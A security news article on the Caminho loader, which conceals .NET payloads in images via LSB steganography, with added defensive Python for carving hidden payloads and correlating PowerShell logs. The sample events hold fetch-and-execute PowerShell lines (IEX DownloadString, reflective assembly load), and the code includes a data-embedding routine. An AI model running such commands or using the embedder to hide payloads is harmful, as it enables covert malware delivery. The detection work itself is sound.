Caminho Malware Loader Conceals .NET Payloads inside Images via LSB Steganography

Cybersecurity researchers at Arctic Wolf Labs have uncovered a cunning new threat dubbed Caminho, a Brazilian Loader-as-a-Service (LaaS) that’s turning everyday images into Trojan horses for malware.

Active since March 2025 and evolved rapidly by June, this operation hides .NET payloads using Least Significant Bit (LSB) steganography inside files hosted on trusted sites like archive.org.

The technique allows attackers to smuggle remote access tools and infostealers past defenses, targeting businesses across South America, Africa, and Eastern Europe.

The attack kicks off with spear-phishing emails laced with social engineering bait, like fake invoices or urgent quotes, disguised as RAR or ZIP archives containing JavaScript or VBScript files.

Once opened, these scripts fetch obfuscated PowerShell code from pastebin services such as paste.ee, which then pulls down seemingly innocent images from legitimate archives.

Hidden within these JPG or PNG files is a .NET loader named Caminho—Portuguese for “path”—extracted via LSB steganography that tweaks the least significant bits of pixel colors to encode malicious data without altering the image’s appearance.

The PowerShell script scans for a unique byte signature in the image, isolates the embedded payload, and loads it straight into memory, bypassing disk writes to evade antivirus scans.
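The three steps just described (read the LSB plane, look for a byte signature, carve out the payload) are what a forensic analyst reverses when triaging a suspicious image. The following Python is an added example, not code from Arctic Wolf or from the loader itself: it reads pixel channel bytes, reassembles the LSB stream, searches for a marker and reports an entropy statistic. The marker value, the bit order, and the length-prefixed layout after the marker are all assumptions, since the article does not publish the real signature; the cover image and payload are constructed fixtures.

```python
import math
import struct

# Constructed marker (assumption): the article says the loader's PowerShell
# scans the image for a "unique byte signature" but does not publish it, so
# this stand-in value is used for the demonstration only.
MARKER = b"CAMINHO-TEST-MARK"

# Constructed stand-in for the hidden .NET payload: an "MZ" header followed by
# 256 distinct byte values, so it is high-entropy like a real packed assembly.
SAMPLE_PAYLOAD = b"MZ" + bytes(range(256))


def make_cover(width: int = 64, height: int = 64) -> bytes:
    """Build a synthetic RGB cover (3 channel bytes per pixel) with a smooth
    gradient. A real photograph's LSB plane is noisier than this, which is
    why the entropy statistic below is only a supporting signal."""
    return bytes(((i * 7) + (i // 3)) & 0xFF for i in range(width * height * 3))


def lsb_stream(channels: bytes) -> bytes:
    """Collect the least significant bit of every channel value into bytes,
    8 channel values per output byte, most significant bit first (the bit
    order is an assumption; the article does not specify it)."""
    out = bytearray()
    for i in range(0, len(channels) - 7, 8):
        value = 0
        for j in range(8):
            value = (value << 1) | (channels[i + j] & 1)
        out.append(value)
    return bytes(out)


def embed_lsb(cover: bytes, data: bytes) -> bytes:
    """Write data into the cover's LSBs (same layout that lsb_stream reads).
    Used here only to build the test fixture."""
    if len(data) * 8 > len(cover):
        raise ValueError("cover too small for data")
    out = bytearray(cover)
    k = 0
    for byte in data:
        for shift in range(7, -1, -1):
            out[k] = (out[k] & 0xFE) | ((byte >> shift) & 1)
            k += 1
    return bytes(out)


def build_fixture(cover: bytes, payload: bytes, marker: bytes = MARKER) -> bytes:
    """Constructed stego image: marker, 4-byte little-endian length, payload."""
    return embed_lsb(cover, marker + struct.pack("<I", len(payload)) + payload)


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; close to 8.0 for packed or encrypted data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def carve_payload(channels: bytes, marker: bytes = MARKER):
    """Scan the LSB stream for the marker and return (offset, payload) or None.
    The length-prefixed layout after the marker is an assumption."""
    stream = lsb_stream(channels)
    idx = stream.find(marker)
    if idx < 0:
        return None
    start = idx + len(marker)
    if start + 4 > len(stream):
        return None
    (length,) = struct.unpack("<I", stream[start:start + 4])
    payload = stream[start + 4:start + 4 + length]
    if len(payload) != length:
        return None
    return idx, payload


def triage(channels: bytes, marker: bytes = MARKER) -> dict:
    """Forensic summary for one image: marker hit plus LSB-plane entropy."""
    found = carve_payload(channels, marker)
    return {
        "lsb_entropy": round(shannon_entropy(lsb_stream(channels)), 3),
        "marker_found": found is not None,
        "payload_length": len(found[1]) if found else 0,
        "payload_entropy": round(shannon_entropy(found[1]), 3) if found else 0.0,
    }


if __name__ == "__main__":
    cover = make_cover()
    stego = build_fixture(cover, SAMPLE_PAYLOAD)
    print("clean cover:", triage(cover))
    print("stego image:", triage(stego))
```

To run this against a real file, feed `carve_payload` the raw channel bytes of the decoded image (for example `Image.open(path).convert("RGB").tobytes()` with Pillow); the PNG or JPEG container itself is irrelevant, because the hidden data lives in the decoded pixel values. Note that the stego image differs from the cover by at most one unit per channel, which is exactly why the image looks unchanged and why signature-based file scanning of the image alone does not help.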

From there, the loader injects the final malware into benign processes like calc.exe, the Windows calculator, while setting up persistence through scheduled tasks that rerun the chain every minute.​

This fileless approach, combined with anti-analysis tricks like VM detection and debugger checks, makes Caminho notoriously hard to spot. Researchers analyzed 71 samples, all featuring heavy obfuscation but consistent Portuguese strings and a quirky HackForums namespace, pointing to a modular design built for reuse.

Loader-as-a-Service Fuels Payload Variety

What sets Caminho apart is its business model: a service where operators rent the loader to deliver custom malware, accepting any URL as an argument for flexibility.

Observed payloads include the versatile REMCOS RAT for remote control, via bulletproof hosting; XWorm from shady domains; and Katz Stealer, a credential grabber first noted by Nextron Systems in May 2025.

The same steganographic images pop up across campaigns with different endgames, confirming this rental setup and explaining the payload diversity.

Infrastructure mixes legit platforms for staging—archive.org for images, paste sites for scripts—with resilient C2 servers on providers like Railnet LLC, known for dodging takedowns.

High-confidence attribution ties Caminho to Brazil, thanks to pervasive Portuguese code in variables, errors, and comments, plus targeting that starts in South America and spikes during local business hours.

Victims span industries in Brazil, South Africa, Ukraine, and Poland, with geographic spread accelerating post-June as steganography matured the operation.

No nation-state vibes here; it’s financially driven cybercrime, abusing trusted sites to challenge traditional blocks without disrupting legit traffic.

As threats like this grow, experts urge layered defenses: sandbox attachments, PowerShell logging, and AI-driven EDR to catch behavioral red flags.
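PowerShell logging is only useful if something correlates what it records. The following Python is an added example (not a product rule and not from the Arctic Wolf report) showing how the chain described in this article looks in Windows event 4104 (script block logging) and 4698 (scheduled task created) records, and how to score the stages per host: a paste-site fetch, an image pulled from archive.org, in-memory assembly loading, and a task that repeats every minute. The sample events, hostnames, URLs and item ids are constructed placeholders, and the alert threshold is a heuristic.

```python
import re
from collections import defaultdict

# Constructed sample events (not real telemetry). Only the fields needed here
# are modelled: event id, host, and the script block or task XML text.
SAMPLE_EVENTS = [
    {"id": 4104, "host": "ws01",
     "text": "$u='https://paste.ee/r/EXAMPLE-ID';"
             "IEX ((New-Object Net.WebClient).DownloadString($u))"},
    {"id": 4104, "host": "ws01",
     "text": "$img=(New-Object Net.WebClient).DownloadData("
             "'https://archive.org/download/EXAMPLE-ITEM/photo.png');"
             "$asm=[System.Reflection.Assembly]::Load($payload)"},
    {"id": 4698, "host": "ws01",
     "text": "<Task><Triggers><TimeTrigger><Repetition><Interval>PT1M</Interval>"
             "</Repetition></TimeTrigger></Triggers></Task>"},
    {"id": 4104, "host": "ws02",
     "text": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"},
    {"id": 4698, "host": "ws02",
     "text": "<Task><Triggers><CalendarTrigger><ScheduleByDay/>"
             "</CalendarTrigger></Triggers></Task>"},
]

# Stage indicators taken from the article's description of the chain.
# Task Scheduler XML expresses a one-minute repetition as ISO 8601 "PT1M".
RULES = {
    4104: [
        ("paste_site_fetch", re.compile(r"paste\.ee/|pastebin", re.I)),
        ("archive_image_fetch",
         re.compile(r"archive\.org/\S*\.(?:png|jpe?g)\b", re.I)),
        ("download_to_memory",
         re.compile(r"\.Download(?:String|Data)\(|Invoke-WebRequest", re.I)),
        ("inline_execution", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
        ("reflective_assembly_load",
         re.compile(r"Reflection\.Assembly\]::Load\(", re.I)),
    ],
    4698: [
        ("task_repeats_every_minute",
         re.compile(r"<Interval>PT1M</Interval>", re.I)),
    ],
}


def match_rules(event: dict) -> list:
    """Names of every rule for this event id whose pattern hits the text."""
    return [name for name, rx in RULES.get(event["id"], []) if rx.search(event["text"])]


def correlate(events: list) -> dict:
    """Collect rule hits per host so the separate stages are seen together."""
    hits = defaultdict(set)
    for ev in events:
        hits[ev["host"]]  # ensure every host appears, even with no hits
        for name in match_rules(ev):
            hits[ev["host"]].add(name)
    return {host: sorted(names) for host, names in hits.items()}


def verdict(rule_names: list) -> str:
    """Heuristic threshold: a remote fetch that is executed or loaded without
    touching disk, plus a staging site or the one-minute task, is an alert;
    any single hit is worth a look; nothing is clean."""
    s = set(rule_names)
    fetch_and_run = "download_to_memory" in s and bool(
        {"inline_execution", "reflective_assembly_load"} & s)
    staging = {"paste_site_fetch", "archive_image_fetch",
               "task_repeats_every_minute"} & s
    if fetch_and_run and staging:
        return "alert"
    if s:
        return "review"
    return "clean"


def triage(events: list) -> dict:
    """Map each host to (verdict, sorted rule names)."""
    return {host: (verdict(names), names) for host, names in correlate(events).items()}


if __name__ == "__main__":
    for host, (level, names) in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {level} {names}")
```

Correlating per host matters because the script that downloads the paste and the script that loads the assembly usually arrive as separate 4104 records, and the scheduled task is logged by a different provider altogether; individually each looks like routine admin activity, together they reproduce the chain the article describes.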

Caminho shows how steganography is no longer niche—it’s a go-to for evading the spotlight in an arms race against detection. With the campaign still active into October 2025, organizations must stay vigilant against these hidden paths to infection.
